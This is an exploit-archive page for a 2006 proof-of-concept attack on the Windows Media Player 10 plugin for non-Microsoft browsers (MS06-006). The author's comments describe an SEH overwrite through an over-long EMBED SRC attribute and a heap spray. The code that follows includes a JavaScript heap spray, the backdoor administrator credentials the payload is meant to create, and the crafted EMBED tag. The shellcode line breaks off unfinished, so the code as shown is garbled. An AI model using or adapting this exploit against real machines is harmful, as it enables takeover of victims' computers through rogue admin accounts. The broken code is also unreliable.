Microsoft Windows Media Player 10 - Plugin Overflow (MS06-006)

Related Vulnerabilities: CVE-2006-0005  
Publish Date: 17 Feb 2006

// Windows Media Player Plug-In EMBED Overflow Universal Exploit (MS06-006)
// By Matthew Murphy (
// This exploit code is intended only as a demonstration tool for
// educational or testing purposes. It is not intended to be used for any
// unauthorized or illicit purpose. Any testing done with this tool must
// be limited to systems that you own or are explicitly authorized to
// test.
// By utilizing or possessing this code, you assume any and all
// responsibility for damage that results. The author will not be held
// responsible, under any circumstances, for damage that arises from your
// possession or use of this code.
// Tested: 
// Firefox
// Windows Media Player 10
// Windows XP SP2 (US)
// The Windows Media Player plug-in for non-Microsoft browsers (Firefox,
// Opera, etc.) suffers from an exploitable overflow in its handling of
// EMBED tags. Specifically, a very long SRC property on such a tag can
// lead to an overflow that will corrupt a structured exception handling
// frame.
// The SEH frame is the vector of control that I exploit. Fortunately,
// DEP is turned off for non-Microsoft code, so there's no issue there.
// That's really a shame, because such a move would've made an already
// difficult exploit much harder.
// One of the reasons the exploit is tough is because the overrun buffer
// (the SRC attribute) is seriously mangled before it is handled by the
// plug-in. In particular, any character with the sign bit set (> 0x7F)
// is replaced.
// We could do as the creative wizards like HD Moore suggest and use an
// alphanumeric payload with some cute SEH tricks. Let me rephrase:
// YOU could do as the creative wizards suggest. Meanwhile, I'm perfectly 
// content to throw my code in another buffer and get around all the silly 
// alpha-numeric sanitation. Sure beats devoting hours to beating it
// with fancy shellcode, all for a PoC I may never release.
// Instead, I shamelessly ripped a page from Skylined's book and borrowed
// (and cleaned up) the heap spraying technique. My heap-spray is a lot
// less precise, because the memory layout is a lot more variable. In
// my experience, it took a _HUGE_ block allocation to get the heap I 
// wanted to jump to into a reliably-placed location. Hence the atrocity
// of the 16MB of noops below.
// Aside from the character restrictions, this is a standard stack-based
// overflow. I simply smash the SEH frame with a pointer to my HUGE heap
// block, which consists of a bunch of 0x41 characters. An INC ECX is a
// functional noop -- so the box takes the slide down the heap into the
// shellcode. The shellcode is a standard Win32 "add administrator" 
// payload from Metasploit.
// This exploit is a lot of ripping, cleaning and re-implementation, but
// that just goes to show how easy it is to write. So... how about that 
// 'Important' rating? A bit perplexing to rate a "click-and-own" as an
// Important... or is it just because nobody would *DARE* run one of those
// "Non-Microsoft" browsers on Windows? :-)

// Spray the heap
var spray = unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
do {
spray += spray;
} while (spray.length < 0x1000000);

// If this is successful, you can login as a local admin:
// User: wmp0wn3d
// Pass: password

spray += unescape(
<EMBED SRC="----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLAAANNNNOOOOAAAQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ0000111122223333444455556666777788889999.wmv"></EMBED>

# [2006-02-17]